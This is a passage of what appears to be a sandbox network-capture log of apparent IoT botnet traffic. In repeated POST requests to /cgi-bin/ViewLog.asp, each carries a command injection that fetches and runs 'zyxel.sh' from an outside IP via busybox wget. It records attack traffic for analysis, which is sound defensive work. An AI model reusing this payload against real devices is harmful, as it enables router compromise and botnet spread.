                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            683192.168.2.235886462.29.111.2328080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:29:31.384989977 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            684192.168.2.236074694.122.115.2148080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:29:31.385119915 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            685192.168.2.235470094.123.62.1818080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:29:31.385247946 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            686192.168.2.235804294.120.218.458080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:29:31.389229059 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            687192.168.2.233632894.121.29.2038080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:29:31.389369011 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            688192.168.2.235525495.86.79.1548080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:29:31.392577887 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            689192.168.2.235246494.104.120.1528080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:29:31.609535933 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            690192.168.2.234375295.164.77.248080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:29:32.003016949 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:29:32.193257093 CET1260INHTTP/1.1 400 Bad Request
                                                            Server: squid/4.10
                                                            Mime-Version: 1.0
                                                            Date: Wed, 14 Feb 2024 08:29:32 GMT
                                                            Content-Type: text/html;charset=utf-8
                                                            Content-Length: 3543
                                                            X-Squid-Error: ERR_INVALID_URL 0
                                                            Vary: Accept-Language
                                                            Content-Language: en
                                                            X-Cache: MISS from localhost
                                                            X-Cache-Lookup: NONE from localhost:8080
                                                            Via: 1.1 localhost (squid/4.10)
                                                            Connection: close
                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 74 79 70 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 31 39 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 52 52 4f 52 3a 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 72 65 74 72 69 65 76 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 20 0a 20 2f 2a 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 32 30 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 0a 20 2a 0a 20 2a 20 53 71 75 69 64 20 73 6f 66 74 77 61 72 65 20 69 73 20 64 69 73 74 72 69 62 75 74 65 64 20 75 6e 64 65 72 20 47 50 4c 76 32 2b 20 6c 69 63 65 6e 73 65 20 61 6e 64 20 69 6e 63 6c 75 64 65 73 0a 20 2a 20 63 6f 6e 74 72 69 62 75 74 69 6f 6e 73 20 66 72 6f 6d 20 6e 75 6d 65 72 6f 75 73 20 69 6e 64 69 76 69 64 75 61 6c 73 20 61 6e 64 20 6f 72 67 61 6e 69 7a 61 74 69 6f 6e 73 2e 0a 20 2a 20 50 6c 65 61 73 65 20 73 65 65 20 74 68 65 20 43 4f 50 59 49 4e 47 20 61 6e 64 20 43 4f 4e 54 52 49 42 55 54 4f 52 53 20 66 69 6c 65 73 20 66 6f 72 20 64 65 74 61 69 6c 73 2e 0a 20 2a 2f 0a 0a 2f 2a 0a 20 53 74 79 6c 65 73 68 65 65 74 20 66 6f 72 20 53 71 75 69 64 20 45 72 72 6f 72 20 70 61 67 65 73 0a 20 41 64 61 70 74 65 64 20 66 72 6f 6d 20 64 65 73 69 67 6e 20 62 79 20 46 72 65 65 20 43 53 53 20 54 65 6d 70 6c 61 74 65 73 0a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 66 72 65 65 63 73 73 74 65 6d 70 6c 61 74 65 73 2e 6f 72 67 0a 20 52 65 6c 65 61 73 65 64 20 66 6f 72 20 66 72 65 65 20 75 6e 64 65 72 20 61 20 43 72 65 61 74 69 76 65 20 43 6f 6d 6d 6f 6e 73 20 41 74 74 72 69 62 75 74 69 6f 6e 20 32 2e 35 20 4c 69 63 65 6e 73 65 0a 2a 2f 0a 0a 2f 2a 20 50 61 67 65 20 62 61 73 69 63 73 20 2a 2f 0a 2a 20 7b 0a 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 76 65 72 64 61 6e 61 2c 20 73 61 6e 73
                                                            Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><meta type="copyright" content="Copyright (C) 1996-2019 The Squid Software Foundation and contributors"><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><title>ERROR: The requested URL could not be retrieved</title><style type="text/css">... /* * Copyright (C) 1996-2020 The Squid Software Foundation and contributors * * Squid software is distributed under GPLv2+ license and includes * contributions from numerous individuals and organizations. * Please see the COPYING and CONTRIBUTORS files for details. *//* Stylesheet for Squid Error pages Adapted from design by Free CSS Templates http://www.freecsstemplates.org Released for free under a Creative Commons Attribution 2.5 License*//* Page basics */* {font-family: verdana, sans


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            691192.168.2.235181894.177.135.2328080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:29:32.078176022 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:29:32.273192883 CET1286INHTTP/1.0 400 Bad Request
                                                            Server: squid/3.1.9
                                                            Mime-Version: 1.0
                                                            Date: Tue, 06 Apr 2021 05:24:49 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 3161
                                                            X-Squid-Error: ERR_INVALID_URL 0
                                                            Connection: close
                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 20 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 20 3c 74 69 74 6c 65 3e 45 52 52 4f 52 3a 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 72 65 74 72 69 65 76 65 64 3c 2f 74 69 74 6c 65 3e 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 20 20 20 2f 2a 0a 20 53 74 79 6c 65 73 68 65 65 74 20 66 6f 72 20 53 71 75 69 64 20 45 72 72 6f 72 20 70 61 67 65 73 0a 20 41 64 61 70 74 65 64 20 66 72 6f 6d 20 64 65 73 69 67 6e 20 62 79 20 46 72 65 65 20 43 53 53 20 54 65 6d 70 6c 61 74 65 73 0a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 66 72 65 65 63 73 73 74 65 6d 70 6c 61 74 65 73 2e 6f 72 67 0a 20 52 65 6c 65 61 73 65 64 20 66 6f 72 20 66 72 65 65 20 75 6e 64 65 72 20 61 20 43 72 65 61 74 69 76 65 20 43 6f 6d 6d 6f 6e 73 20 41 74 74 72 69 62 75 74 69 6f 6e 20 32 2e 35 20 4c 69 63 65 6e 73 65 0a 2a 2f 0a 0a 2f 2a 20 50 61 67 65 20 62 61 73 69 63 73 20 2a 2f 0a 2a 20 7b 0a 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 76 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 7d 0a 0a 68 74 6d 6c 20 62 6f 64 79 20 7b 0a 09 6d 61 72 67 69 6e 3a 20 30 3b 0a 09 70 61 64 64 69 6e 67 3a 20 30 3b 0a 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 65 66 65 66 65 66 3b 0a 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 32 70 78 3b 0a 09 63 6f 6c 6f 72 3a 20 23 31 65 31 65 31 65 3b 0a 7d 0a 0a 2f 2a 20 50 61 67 65 20 64 69 73 70 6c 61 79 65 64 20 74 69 74 6c 65 20 61 72 65 61 20 2a 2f 0a 23 74 69 74 6c 65 73 20 7b 0a 09 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 31 35 70 78 3b 0a 09 70 61 64 64 69 6e 67 3a 20 31 30 70 78 3b 0a 09 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 20 31 30 30 70 78 3b 0a 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 75 72 6c 28 27 68 74 74 70 3a 2f 2f 77 77 77 2e 73 71 75 69 64 2d 63 61 63 68 65 2e 6f 72 67 2f 41 72 74 77 6f 72 6b 2f 53 4e 2e 70 6e 67 27 29 20 6e 6f 2d 72 65 70 65 61 74 20 6c 65 66 74 3b 0a 7d 0a 0a 2f 2a 20 69 6e 69 74 69 61 6c 20 74 69 74 6c 65 20 2a 2f 0a 23 74 69 74 6c 65 73 20 68 31 20 7b 0a 09 63 6f 6c 6f 72 3a 20 23 30 30 30 30 30 30 3b 0a 7d 0a 23 74 69 74 6c 65 73 20 68 32 20 7b 0a 09 63 6f 6c 6f 72 3a 20 23 30 30 30 30 30 30 3b 0a 7d 0a 0a 2f 2a 20 73 70 65 63 69 61 6c 20 65 76 65 6e 74 3a 20 46 54 50 20 73 75 63 63 65 73 73 20 70 61 67 65 20 74 69 74 6c 65 73 20 2a 2f 0a 23 74 69 74 6c 65 73 20 66 74 70 73 75 63 63 65 73 73 20 7b 0a 09 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 66 66 30 30 3b 0a 09 77 69 64 74 68 3a 31 30 30 25 3b 0a 7d 0a 0a 2f 2a 20 50 61 67 65 20 64 69 73 70 6c 61 79 65 64 20 62 6f 64 79 20 63 6f 6e 74 65 6e 74 20 61 72 65 61 20 2a 2f 0a 23 63 6f 6e 74 65 6e 74 20 7b 0a 09 70 61 64 64 69 6e 67 3a 20 31 30 70 78 3b 0a 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 66 66 66 3b
                                                            Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html><head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8"> <title>ERROR: The requested URL could not be retrieved</title> <style type="text/css">... /* Stylesheet for Squid Error pages Adapted from design by Free CSS Templates http://www.freecsstemplates.org Released for free under a Creative Commons Attribution 2.5 License*//* Page basics */* {font-family: verdana, sans-serif;}html body {margin: 0;padding: 0;background: #efefef;font-size: 12px;color: #1e1e1e;}/* Page displayed title area */#titles {margin-left: 15px;padding: 10px;padding-left: 100px;background: url('http://www.squid-cache.org/Artwork/SN.png') no-repeat left;}/* initial title */#titles h1 {color: #000000;}#titles h2 {color: #000000;}/* special event: FTP success page titles */#titles ftpsuccess {background-color:#00ff00;width:100%;}/* Page displayed body content area */#content {padding: 10px;background: #ffffff;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            692192.168.2.235083431.207.35.1858080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:29:32.083281994 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:29:32.283853054 CET304INHTTP/1.1 400 Bad Request
                                                            Date: Wed, 14 Feb 2024 08:29:32 GMT
                                                            Server: Apache
                                                            Content-Length: 126
                                                            Connection: close
                                                            Content-Type: text/html; charset=iso-8859-1
                                                            Data Raw: 3c 73 63 72 69 70 74 3e 64 6f 63 75 6d 65 6e 74 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 27 2b 6c 6f 63 61 74 69 6f 6e 2e 68 6f 73 74 6e 61 6d 65 2b 27 3a 27 2b 6c 6f 63 61 74 69 6f 6e 2e 70 6f 72 74 3b 3c 2f 73 63 72 69 70 74 3e 3c 68 31 3e 45 72 72 6f 72 20 34 30 30 20 2d 20 74 72 79 69 6e 67 20 74 6f 20 72 65 64 69 72 65 63 74 3c 2f 68 31 3e
                                                            Data Ascii: <script>document.location.href='https://'+location.hostname+':'+location.port;</script><h1>Error 400 - trying to redirect</h1>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            693192.168.2.233634431.136.219.2498080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:29:32.105325937 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:29:32.790472984 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:29:34.134213924 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:29:36.949826002 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:29:42.325174093 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:29:53.075613976 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:30:15.344439030 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:30:58.346554995 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
